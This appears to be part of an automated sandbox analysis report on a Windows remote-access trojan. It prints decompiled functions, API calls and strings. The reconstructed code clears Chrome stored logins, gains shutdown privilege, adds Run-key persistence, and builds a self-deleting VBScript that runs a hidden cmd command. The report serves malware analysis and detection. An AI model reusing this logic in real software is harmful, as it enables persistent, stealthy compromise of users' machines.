                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004071C4
                                        Strings
                                        • [Chrome StoredLogins found, cleared!], xrefs: 004071AC
                                        • [Chrome StoredLogins not found], xrefs: 00407179
                                        • UserProfile, xrefs: 0040711F
                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00407119
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                        • API String ID: 3740952235-1062637481
                                        • Opcode ID: 14abc8a0a64898b0e6148fec52b2315570b0cd587dd224fa0db585d81b73ae0c
                                        • Instruction ID: 31ca8e98cb087ed4ee3b22d3c36486bbccf77f9584d8598ce9e7038f5dc1f740
                                        • Opcode Fuzzy Hash: 14abc8a0a64898b0e6148fec52b2315570b0cd587dd224fa0db585d81b73ae0c
                                        • Instruction Fuzzy Hash: 51118475904509EBCB00BBE0ED4E9FE7738DA547417504036E812E32E1EA796A45CBAA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E0040EC0F() {
                                        				void* _v8;
                                        				intOrPtr _v12;
                                        				struct _TOKEN_PRIVILEGES _v24;
                                        				signed int _t14;
                                        
                                        				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
                                        				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                        				_v24.PrivilegeCount = 1;
                                        				_v12 = 2;
                                        				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
                                        				_t14 = GetLastError();
                                        				asm("sbb eax, eax");
                                        				return  ~( ~_t14);
                                        			}

                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000028,?,0041B310,?,?,?,?,?,0040DF86), ref: 0040EC1C
                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0040DF86), ref: 0040EC23
                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040EC35
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0040EC54
                                        • GetLastError.KERNEL32 ref: 0040EC5A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                        • String ID: SeShutdownPrivilege
                                        • API String ID: 3534403312-3733053543
                                        • Opcode ID: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                        • Instruction ID: 48ce616a36d9155281e91bb523584d4266b4366c7e509a05eb39360af07fb4fb
                                        • Opcode Fuzzy Hash: c00110eb4c6ec2bacec55e51135d224bb90ade642968878b66c6ed2f365041fe
                                        • Instruction Fuzzy Hash: EFF01271941129FBDB00ABE0ED0DAEF7EBCEB49744F104120B906E1090C6749A08CAA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040AE88
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEA4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEB4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEC1
                                          • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                          • Part of subcall function 004124BE: time.MSVCRT ref: 004124E5
                                          • Part of subcall function 004124BE: srand.MSVCRT ref: 004124F2
                                          • Part of subcall function 004124BE: rand.MSVCRT ref: 00412506
                                          • Part of subcall function 004124BE: rand.MSVCRT ref: 0041251A
                                          • Part of subcall function 004124BE: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                          • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                          • Part of subcall function 004124BE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AED3
                                          • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                          • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                          • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                          • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AEEB
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AEFD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF18
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF2A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF42
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF4B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AF69
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF7B
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040AF88
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040AF95
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AF9F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFB2
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFBB
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFC4
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFCD
                                        • Sleep.KERNEL32(00000064), ref: 0040AFDD
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AFE6
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AFFA
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B00C
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B019
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B026
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B030
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B043
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B04C
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B055
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040B066
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040B07D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B08F
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B09C
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B0A9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B0B3
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0C7
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D0
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0E2
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040B0EB
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040B0FF
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B111
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B11E
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B12B
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B135
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B149
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B152
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B15B
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B164
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B196
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B1AF
                                        • DeleteFileW.KERNEL32(00000000), ref: 0040B1B6
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B1C5
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B1E1
                                        • DeleteFileW.KERNEL32(00000000), ref: 0040B1E8
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B1F1
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B20A
                                        • DeleteFileW.KERNEL32(00000000), ref: 0040B211
                                        • Sleep.KERNEL32(000001F4), ref: 0040B22A
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415B14), ref: 0040B243
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,Function_0001B310,?,Function_0001B310,?,Function_0001B310,?,Function_0001B310,00000000,?,?,?,00000000), ref: 0040B28B
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,Function_0001B310,?,Function_0001B310,00000000,?,?,?,00000000), ref: 0040B29B
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Function_0001B310,?,Function_0001B310,00000000,?,?,?,00000000), ref: 0040B2AB
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Function_0001B310,?,Function_0001B310,00000000,?,?,?), ref: 0040B2B8
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,Function_0001B310,?,Function_0001B310,00000000), ref: 0040B2C5
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_0001B310), ref: 0040B2D2
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B2DF
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000069), ref: 0040B300
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B309
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B312
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B31B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B327
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B333
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B33F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B2E9
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B408
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B411
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B41D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B426
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B42F
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B43B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B447
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B450
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B459
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B462
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B46B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B474
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@G@std@@$??1?$basic_string@$D@2@@std@@$G@2@@std@@$V?$basic_string@$Hstd@@$?c_str@?$basic_string@$G@2@@0@V10@0@$??0?$basic_string@$D@2@@0@$D@1@@File$G@1@@V10@V10@@$Delete$SleepV01@@rand$??8std@@CreateModuleNameV01@Y?$basic_string@srandtime
                                        • String ID: /stext "
                                        • API String ID: 1338134179-3856184850
                                        • Opcode ID: 5ffcdff64bcc1c6a9a9668ba802c80dca196d14f5aa7d340fadde5d72a710b36
                                        • Instruction ID: be4b94b66ba9b0bd8820f021ae38252d46d58d745cb1822e142cef95b78b0ffe
                                        • Opcode Fuzzy Hash: 5ffcdff64bcc1c6a9a9668ba802c80dca196d14f5aa7d340fadde5d72a710b36
                                        • Instruction Fuzzy Hash: 4D02EDB2C0050DEBDB05EBE0EC59EDE7B7CAF54345F04806AF516A3091EB745689CBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 20%
                                        			E004085AC(char _a4) {
                                        				signed int _v5;
                                        				char _v6;
                                        				char _v24;
                                        				char _v40;
                                        				char _v56;
                                        				char _v72;
                                        				char _v88;
                                        				void* _v104;
                                        				void* _v120;
                                        				short _v640;
                                        				void* _t63;
                                        				char* _t65;
                                        				WCHAR* _t68;
                                        				char* _t69;
                                        				char* _t71;
                                        				char* _t74;
                                        				char* _t75;
                                        				char* _t76;
                                        				char* _t77;
                                        				signed int* _t79;
                                        				char* _t80;
                                        				char* _t81;
                                        				signed int _t82;
                                        				short* _t84;
                                        				char* _t85;
                                        				char* _t86;
                                        				WCHAR* _t88;
                                        				char* _t89;
                                        				char* _t90;
                                        				short* _t154;
                                        				void* _t161;
                                        				void* _t162;
                                        				void* _t164;
                                        				void* _t166;
                                        
                                        				_t63 = E0040AC8C();
                                        				if( *0x41b154 != 0x30) {
                                        					_t63 = E00406D41(0x41b900);
                                        				}
                                        				if( *0x41c118 == 1) {
                                        					_t63 = E0041050F(_t63);
                                        				}
                                        				if( *0x41b22a != 0) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t63 = E00412BEE(_t63);
                                        				}
                                        				_t94 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                        				if( *0x41ba58 == 1) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t63 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t63);
                                        					_t161 = _t161 + 0xc;
                                        				}
                                        				if( *0x41bc64 == 1) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t63 = E0040B9E8(0x80000002, _t94, _t63);
                                        					_t161 = _t161 + 0xc;
                                        				}
                                        				if( *0x41ba20 == 1) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					_t63 = E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t63);
                                        					_t161 = _t161 + 0xc;
                                        				}
                                        				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				_t65 = E0040B692(0x80000001,  &_v640, "exepath",  &_v640, 0x208, _t63, _t63);
                                        				_t162 = _t161 + 0x1c;
                                        				if(_t65 == 0) {
                                        					_t65 = GetModuleFileNameW(0,  &_v640, 0x208);
                                        				}
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        				RegDeleteKeyA(0x80000001, _t65);
                                        				_v5 = 1;
                                        				_t68 = SetFileAttributesW( &_v640, 0x80);
                                        				if(_t68 == 0) {
                                        					_v5 = _v5 & _t68;
                                        				}
                                        				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
                                        				if(_t68 != 0) {
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					SetFileAttributesW(_t68, 0x80);
                                        				}
                                        				_t69 =  &_v6;
                                        				__imp___wgetenv(L"Temp", _t69, L"\\update.vbs");
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t69);
                                        				L00414146();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t69);
                                        				_t71 =  &_v6;
                                        				// Script body, assembled as a wide string. Header lines:
                                        				//   Set fso = CreateObject("Scripting.FileSystemObject")
                                        				//   On Error Resume Next
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t71);
                                        				L0041416A();
                                        				_t164 = _t162 + 0x18;
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v40, L"On Error Resume Next\n", _t71);
                                        				// Emitted only when the attribute reset succeeded: while fso.FileExists("<exepath>") ... wend,
                                        				// which keeps retrying the delete until the exiting process releases the file.
                                        				if(_v5 != 0) {
                                        					_t88 =  &_v640;
                                        					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t88,  &_v6, L"\")\n");
                                        					_t89 =  &_v72;
                                        					L0041416A();
                                        					_t90 =  &_v24;
                                        					L00414146();
                                        					_t164 = _t164 + 0x18;
                                        					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t90, _t90, _t89, _t89, L"while fso.FileExists(\"", _t88);
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				}
                                        				// fso.DeleteFile "<exepath>"
                                        				_t154 = L"\"\n";
                                        				_t74 =  &_v6;
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t74,  &_v640, _t154);
                                        				_t75 =  &_v72;
                                        				L00414146();
                                        				_t76 =  &_v56;
                                        				L00414146();
                                        				_t166 = _t164 + 0x18;
                                        				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t76, _t76, _t75, _t75, _t74);
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				if(_v5 != 0) {
                                        					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
                                        				}
                                        				// When the string at 0x41bc68 is non-empty: fso.DeleteFolder "<that directory>"
                                        				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
                                        				if(_t76 != 0) {
                                        					_t85 =  &_v72;
                                        					L0041416A();
                                        					_t86 =  &_v56;
                                        					L00414146();
                                        					_t166 = _t166 + 0x18;
                                        					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t86, _t86, _t85, _t85, L"fso.DeleteFolder \"", 0x41bc68, _t154);
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				}
                                        				// CreateObject("WScript.Shell").Run "cmd /c ""<_a4>""", 0
                                        				// runs the caller-supplied command (_a4) through cmd with a hidden window (window style 0).
                                        				_t77 =  &_v6;
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t77, "\n");
                                        				_t79 =  &_v5;
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t79,  &_a4, _t77);
                                        				_t80 =  &_v24;
                                        				L0041414C();
                                        				_t81 =  &_v72;
                                        				L0041414C();
                                        				_t82 =  &_v56;
                                        				L00414146();
                                        				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t82, _t82, _t81, _t81, _t80, _t80, _t79);
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				// Last line: the script removes itself once it has run.
